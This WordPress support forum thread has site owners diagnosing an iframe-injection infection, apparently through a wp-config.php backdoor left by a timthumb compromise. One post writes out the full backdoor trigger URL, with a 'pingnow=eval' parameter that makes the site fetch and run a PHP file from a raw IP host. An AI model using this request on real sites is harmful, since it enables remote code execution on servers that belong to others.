WordPress.org

Forums

My website is Infected with Mass Iframe Injection Attack 2 (21 posts)

  1. tinasilvee
    Member
    Posted 3 years ago #

    when I visit my website: http://www.licagentmumbai.com/

    I get an alert : Mass Iframe Injection Attack 2 from Norton. I am unable to locate the source so that I can remove the infection.

    I have this problem in almost all my wordpress websites.

    Please help.

    Regards
    Tina

  2. nsathees
    Member
    Posted 3 years ago #

    I scanned your site with http://sitecheck.sucuri.net/scanner/ and it seems all clear. Any way I have no faith in Norton AV.

  3. tinasilvee
    Member
    Posted 3 years ago #

    Nsathees, Thanks for your help. But When I scan online there is no issue but when it is loaded there is an alert "Mass Iframe Injection Attack 2"

    Regards
    Tina

  4. tinasilvee
    Member
    Posted 3 years ago #

    I found out what the problem was. Please do not install Rss poster free version on your website you will end up getting infected with Mass Iframe Injection Attack 2.

    After Installing a fresh update, updating all the plugins and changing the theme I still got the norton alert Mass Iframe Injection Attack 2 when the site was loaded.

    I believe this plugin has been infected with the virus and when you uninstall this plugin only than your problem will be solved.

    Regards
    Tina

  5. Scott222
    Member
    Posted 3 years ago #

    Hi & Help!

    I built a website with wordpress lastest version and the site is http://www.anchorageradiologist.com and today the account's antivirussoftware norten symatic alert the user to a "web attack mass iframe injection attack 2". Two different window based computer were given this warning but I did not see it or a few others window based computers. i was not able to see warning on my mac. I have made sure all my websites have latest version of wordpress and I have updated all my plugins. I downloaded the files and ran them with Panda Antivirus and nothing was detected. The site was uploaded with filzella and my hosting is through 1and1.com.
    I have no idea want to do so any comments would be greatly appreciated. Thank you so much!

    Stressed to the max

    Scott

  6. afelotreyu
    Member
    Posted 3 years ago #

    Hey Scott,

    so to my giant surprise I also had this on my web page. Seems the attack was from Yesterday, Nov 3, 2011. I couldn't really find how they dumped the code in it. But the page that nsathees reported the following code:

    [Code moderated as per the Forum Rules. Please use the pastebin]

    At this point, I gave up trying to find it. So I login to the admin side directly and did a reinstall of wordpress via the dashboard. Now the page is clean.

    The question now is, how did they get in?\
    A

  7. afelotreyu
    Member
    Posted 3 years ago #

    UPDATE!

    My wp-settings.php was compromised with the following function
    http://pastebin.com/YV38tGHE

    After a little digging I found the sys_get_temp_dir()= /tmp for me, was storing the file wp_inc which of course contained the bad <script> code.

    Hope that helps some of you, I still need to figure out how they got in.
    A

  8. afelotreyu
    Member
    Posted 3 years ago #

    Sorry Mod, did not see the rules, here is the link:
    http://pastebin.com/YV38tGHE

  9. Scott222
    Member
    Posted 3 years ago #

    Thank you so much! Looks like did the trick, do you have any other suggestion to further stop this from occuring in future.

  10. bielefeldt
    Member
    Posted 3 years ago #

    I just had the same issue, Update worked.

    Thanks, that saved the rest of my day...

  11. Scott222
    Member
    Posted 3 years ago #

    This has effected several of my websites, i would update all of your wordpress sites. I hope wordpress is working on finding how their hacking sites.

  12. afelotreyu
    Member
    Posted 3 years ago #

    Sorry Scott, I am actually just starting to get involved with WordPress and I am not a 100% familiar with all the steps to secure a wordpress install, hopefully someone else can help.

    At this point I have modified the permissions on wp-settings.php to only read, that should stop attackers from adding funny functions to my WP but will also stop my WordPress from executing proper updates when run via the Dashboard.

    Again, I still need to figure out how they got in and modified my wp-settings in the first place.

    A

  13. afelotreyu
    Member
    Posted 3 years ago #

    Could someone please tell me what the "/?pingnow=eval" call does?

    I think I found the source of the problem, and how other wordpress are affected, I have the files and will be linking soon, just need to understand what pingnow=eval does.

  14. afelotreyu
    Member
    Posted 3 years ago #

    WordPress Support people, I hope you can find the answer or vulnerability in this post.

    What seems to have happened is that one of my wordpress installs was compromised, from where the attacker modified all wp-settings.php files.

    Here is the log of the "attack"
    http://pastebin.com/dJVztNJ7

    From which I got the following files:

    pp.txt
    just contains an echo echo'test'

    tt.txt
    http://pastebin.com/gcX19qe2

    tt.php
    http://pastebin.com/3vXsNLNL

    and 99.php or 999.php is
    http://pastebin.com/K3yuH2z7
    This last file is what causes the overwrite of all wp-settings.php

    Also, to add to the odd stuff I found a file named upd.php in wp-content. The file contained this:
    http://pastebin.com/1y92Jf0C

    Again, if I can find any more information I will post :)

  15. afelotreyu
    Member
    Posted 3 years ago #

    ARG :( I hate my day right now.. Sorry to the Owner of this post if I may be taking over your original post.

    Anyways, I found where "pingnow" is. It seems the install of wordpress was compromised back in August, which cause the wp-config.php file to be modified and leaving a "backdoor".

    I found they wp-config.php contained a copy of the "wp-config-sample.php" plus 40000 lines of code from which most were blank and somewhere in the middle of the file I found this:
    http://pastebin.com/h9zXeFN6

    Long story, no matter how many times I removed the code from my wp-setttings.php if the permissions are not corrected as well every time someone requested http://blabla.domain/?pingnow=eval&file=http://91.196.216.20/99.php&pass=33e75ff09dd601bbe69f351039152189 all the wp-settings.php for all other installs get modified.

    For does of you having this problems, check "ALL" of your wordpress installs, review the wp-config.php file and make sure you modify thet permissions to write on wp-config.php and wp-settings.php.

    Hope that helps, I am now really tired :(

  16. Scott222
    Member
    Posted 3 years ago #

    Hey there, i went and update all my wordpress files, pretty much took up most of my day. Will this correct the problem or do I need to do additional? The computers that gave the warning now allow the sites to be enter with no problem.

  17. Samuel B
    moderator
    Posted 3 years ago #

  18. afelotreyu
    Member
    Posted 3 years ago #

    Scott, I did the same in all my installs of wordpress, but the one with the actual problem had the issue hidden in the wp-config.php file. As I mention on my last post that file was the one allowing the "attackers" to break all other installs of wordpress, and no matter how many times I updated and reinstall WordPress on it, the issue was still there. I have to manually fix the problem with wp-config.php.

    To be safe, I would suggest you to check all your installs and make sure the wp-config.php file is not infected. If you have a wp-config file with more than 100 lines you may have a problem.

    Again the infected file has about 4000 lines and somewhere in line 2090 is where I found the pingnow funtion.

    One thing I noticed about the wp-config file was that the "salt keys" was the same as the wp-config-sample.php.

    Just be really carefull modifying that file and good luck!

  19. MickeyRoush
    Member
    Posted 3 years ago #

    One thing I noticed about the wp-config file was that the "salt keys" was the same as the wp-config-sample.php.

    the wp-config-sample.php file is not needed and can be removed.

    From looking at your pastebin links it looks like you got hit with a timthumb vulnerability. Make sure that all of your themes and plugins are updated. Research them to make sure that if any of them use the timthumb script or any variant there of is updated to the newest secure code.

  20. runway21studios
    Member
    Posted 3 years ago #

    Thank you so much afelotreyu. I've been dealing with a client that claims there is a problem with his site and no one is able to see it except him (he is an international client, so communication is tough).

    I simply searched through the wp_settings.php and found that same code including the wp_inc. Before, it was showing up as having code in it on a malware scan site. Now its clean. Also checked other sites and saw that our agency website had it too.

    Very strange because I haven't experienced or seen any unusual activity on either site.

  21. afelotreyu
    Member
    Posted 3 years ago #

    Yes MickeyRoush, it seems in my case I was attacked back in august by the timthumb issue and the attacker left a back door on one of the WordPress installs. which allowed him to execute that new iframe attack last week.

    Anyways, Everything else seems fine so far, I am still working on database password changes and stuff like that. Better be safe than sorry.

    Good luck to everyone!

Topic Closed

This topic has been closed to new replies.

About this Topic